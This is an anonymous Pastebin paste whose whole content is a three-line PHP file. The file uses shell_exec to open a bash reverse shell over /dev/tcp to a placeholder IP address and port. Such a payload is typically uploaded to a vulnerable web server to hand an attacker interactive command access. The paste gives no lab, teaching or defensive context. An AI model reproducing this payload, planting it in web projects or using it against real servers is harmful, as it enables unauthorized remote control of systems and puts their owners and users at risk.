Guest User

Untitled

a guest
Jan 18th, 2019
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.08 KB | None | 0 0
  1. <?php
  2. shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'");
  3. ?>
Add Comment
Please, Sign In to add comment